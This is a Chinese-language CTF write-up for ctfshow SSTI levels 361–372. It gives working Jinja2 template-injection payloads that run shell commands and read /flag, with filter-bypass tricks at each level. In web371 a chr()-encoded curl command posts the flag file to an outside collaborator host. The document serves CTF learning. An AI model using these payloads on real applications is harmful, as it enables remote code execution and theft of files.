ctfshow_web-ssti (361~372)
web 361
首先,题目提示,名字就是考点,所以应该是需要我们传一个name的参数
然后就是检查是什么模板
然后找到可以注入的模块,这里我找到的是os._wrap_close在132,找模块的数字我们可以使用python代码来跑
直接些payload
?name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
web362
首先题目提示有过滤,然后其他没变
测试发现过滤了一些数字,如3还有2,这样子我们os._wrap_close这个就不能用了,我们可以去找其他模板,如_frozen_importlib_external.FileLoader这个模块,这个模块在94,没有被过滤,这个模块可以使用内建函数eval执行命令,我们直接构造payload(有很多可以这样做的模块,我们可以用python脚本,去找)
payload
?name={{().__class__.__base__.__subclasses__()[94].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /flag').read()")}}}}
web363
题目还是提示有过滤,试了一下发现过滤了单双引号,我们测试过滤了什么可以一部分一部分的输命令,就可以知道了,我们直接使用request来绕过过滤单双引号
payload
{{().__class__.__base__.__subclasses__()[132].__init__.__globals__.popen(request.args.k).read()}}&k=ls
web364
和上一题增加了对args的过滤,我们使用request.cookies即可绕过
payload
{{().__class__.__base__.__subclasses__()[132].__init__.__globals__.popen(request.cookies.k).read()}}
web365
增加了对中括号的过滤,我们可以使用pop()或者__getitem__魔术方法来进行绕过
payload
?name={{().__class__.__base__.__subclasses__().pop(132).__init__.__globals__.popen(request.cookies.k).read()}}
web366
增加了对下划线的过滤,我们可以使用过滤器attr()和request来绕过
payload
url
?name={{()|attr(request.cookies.a)|attr(request.cookies.b)|attr(request.cookies.c)()|attr(request.cookies.d)(132)|attr(request.cookies.e)|attr(request.cookies.f)|attr(request.cookies.d)(request.cookies.x)(request.cookies.z)|attr(request.cookies.r)()}}cookie
a=__class__;b=__base__;c=__subclasses__;d=__getitem__;e=__init__;f=__globals__;x=popen;z=cat /flag;r=read
web367
过滤了os,用上一题的脚本即可
web 368
又过滤了双大括号,使用{%print%}再配合上一个payload即可
payload
url
{%print ()|attr(request.cookies.a)|attr(request.cookies.b)|attr(request.cookies.c)()|attr(request.cookies.d)(132)|attr(request.cookies.e)|attr(request.cookies.f)|attr(request.cookies.d)(request.cookies.x)(request.cookies.z)|attr(request.cookies.r)()%}cookies
a=__class__;b=__base__;c=__subclasses__;d=__getitem__;e=__init__;f=__globals__;x=popen;z=cat /flag;r=read
web 369
又过滤了request,重新构造payload
用拼接来绕过
{%set pop=dict(pop=a)|join%}
{% set s=dict(aaaaaa=a)|join|length*dict(aaaa=a)|join|length%} //s=24
{% set w=dict(aaaaaa=a)|join|length*dict(aaa=a)|join|length%} //w=18
{% set v=dict(aaaaaaaaaa=a)|join|length*dict(aaaaa=a)|join|length-dict(aaa=a)|join|length%} //v=47
{% set xhx=({}|select()|string()|list|attr(pop)(s))%} //xhx=_
{% set kg=(self|string()|list|attr(pop)(w))%} //kg=空格
{% set glo=(xhx,xhx,dict(glo=a,bals=b)|join,xhx,xhx)|join%}
{% set g=dict(ge=a,t=b)|join%}
{% set ch=dict(ch=a,r=b)|join%}
{% set bu=(xhx,xhx,dict(buil=a,tins=b)|join,xhx,xhx)|join%}
{% set c=lipsum|attr(glo)|attr(g)(bu)|attr(g)(ch)%}
{% set o=dict(o=a,s=a)|join%}
{% set po=dict(po=a,pen=a)|join%}
{% set r=dict(re=a,ad=b)|join%}
{% set a=(dict(ca=a,t=b)|join,kg,c(v),dict(fl=a,ag=b)|join)|join%} //c(v)=/
{{lipsum|attr(glo)|attr(g)(o)|attr(po)(a)|attr(r)()}}
web370
过滤了数字,我上一个脚本就已经绕过了数字,直接使用上一题脚本即可
web371
过滤了print,使用curl外带
跑chr字符的脚本
def half2full(half):full = ''for ch in half:if ord(ch) in range(33, 127):ch = chr(ord(ch) + 0xfee0)elif ord(ch) == 32:ch = chr(0x3000)else:passfull += chreturn full
string = input("你要输入的字符串:")
result = ''
def str2chr(s):global resultfor i in s:result += "c("+half2full(str(ord(i)))+")%2b"
str2chr(string)
print(result[:-3])
payload
{%set pop=dict(pop=a)|join%}
{% set s=dict(aaaaaa=a)|join|length*dict(aaaa=a)|join|length%}
{% set w=dict(aaaaaa=a)|join|length*dict(aaa=a)|join|length%}
{% set v=dict(aaaaaaaaaa=a)|join|length*dict(aaaaa=a)|join|length-dict(aaa=a)|join|length%}
{% set xhx=({}|select()|string()|list|attr(pop)(s))%}
{% set kg=(self|string()|list|attr(pop)(w))%}
{% set glo=(xhx,xhx,dict(glo=a,bals=b)|join,xhx,xhx)|join%}
{% set g=dict(ge=a,t=b)|join%}
{% set ch=dict(ch=a,r=b)|join%}
{% set bu=(xhx,xhx,dict(buil=a,tins=b)|join,xhx,xhx)|join%}
{% set c=lipsum|attr(glo)|attr(g)(bu)|attr(g)(ch)%}
{% set o=dict(o=a,s=a)|join%}
{% set po=dict(po=a,pen=a)|join%}
{% set r=dict(re=a,ad=b)|join%}
{% set a=c(99)%2bc(117)%2bc(114)%2bc(108)%2bc(32)%2bc(45)%2bc(70)%2bc(32)%2bc(97)%2bc(97)%2bc(97)%2bc(61)%2bc(64)%2bc(47)%2bc(102)%2bc(108)%2bc(97)%2bc(103)%2bc(32)%2bc(104)%2bc(116)%2bc(116)%2bc(112)%2bc(58)%2bc(47)%2bc(47)%2bc(55)%2bc(97)%2bc(105)%2bc(112)%2bc(51)%2bc(103)%2bc(109)%2bc(56)%2bc(98)%2bc(117)%2bc(116)%2bc(116)%2bc(107)%2bc(56)%2bc(114)%2bc(119)%2bc(98)%2bc(114)%2bc(55)%2bc(103)%2bc(113)%2bc(116)%2bc(119)%2bc(105)%2bc(97)%2bc(57)%2bc(103)%2bc(48)%2bc(52)%2bc(113)%2bc(115)%2bc(102)%2bc(46)%2bc(111)%2bc(97)%2bc(115)%2bc(116)%2bc(105)%2bc(102)%2bc(121)%2bc(46)%2bc(99)%2bc(111)%2bc(109)%}
{% if lipsum|attr(glo)|attr(g)(o)|attr(po)(a)|attr(r)()%}aaa{%endif%}
web 372
过滤了count,没什么影响貌似,上一个脚本依旧可以